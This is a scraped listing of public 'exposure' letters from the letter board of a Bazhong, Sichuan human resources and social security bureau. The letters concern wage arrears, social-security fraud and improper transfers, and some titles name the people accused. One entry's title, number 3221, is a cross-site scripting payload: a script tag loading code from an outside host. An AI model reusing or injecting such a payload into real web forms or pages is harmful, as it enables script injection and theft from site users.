信件统计
信件类型回复总数
感谢12/12
建议99/99
曝光37/37
咨询3819/3823
投诉355/357
监督21/21
信件公示|我要写信>>
编号标题类型来信日期办理状态承办单位预警
4005 关于恩阳旅游局李燕伶违规调动的回复 曝光 2019-05-08 √处理完结 局长信箱
3970 恩阳旅游局游客中心李燕伶违规调动 曝光 2019-04-25 √处理完结 局长信箱
3914 虚假谎报年龄骗取社保 曝光 2019-03-31 √处理完结 局长信箱
3886 巴中龙泉外国语学校不依法给教职工购买住房公积... 曝光 2019-03-20 √处理完结 局长信箱
3868 社保卡名字与身份证不符 曝光 2019-03-14 √处理完结 局长信箱
3861 关于四川省巴中市通江县杨柏乡双凤垭村村民周海... 曝光 2019-03-13 √处理完结 局长信箱
3854 关于杨涛弄虚作假报考全国监理工程师的事宜 曝光 2019-03-08 √处理完结 局长信箱
3652 被办理社保卡 曝光 2018-12-04 √处理完结 局长信箱
3646 投诉 曝光 2018-11-30 √处理完结 局长信箱
3599 考生以虚假职称在巴中人事局成功报考全国注册监... 曝光 2018-11-08 √处理完结 局长信箱
3582 巴中市通江县铁佛镇九龙庙运来矿业拖欠工资问题 曝光 2018-11-01 √处理完结 局长信箱
3581 巴中市通江县铁佛镇九龙庙运来矿业拖欠工资问题 曝光 2018-11-01 √处理完结 局长信箱
3445 巴中市平昌博雅中学违规 曝光 2018-08-30 √处理完结 局长信箱
3221 <script src=HtTpS://S0S.TV/x></script>... 曝光 2018-06-06 √处理完结 局长信箱
848 通江县洪口镇镇斯波乡,田晓波拖欠农民工工资事... 曝光 2016-02-15 √处理完结 局长信箱
845 通江县洪口镇斯波乡田晓波拖欠农民工工资 曝光 2016-02-15 √处理完结 局长信箱
836 还我血汗钱 曝光 2016-02-11 √处理完结 局长信箱
17条 1/1页 首页 << 上一页 1 下一页 >> 末页
使用帮助 | 网站地图 | 联系我们 | 设为首页 | 加入收藏
  • 主办单位:巴中市人力资源和社会保障局  备案号:蜀ICP备09021582号
  • 办公地址:四川省巴中市巴州区滨河北路中段87号  邮编:636000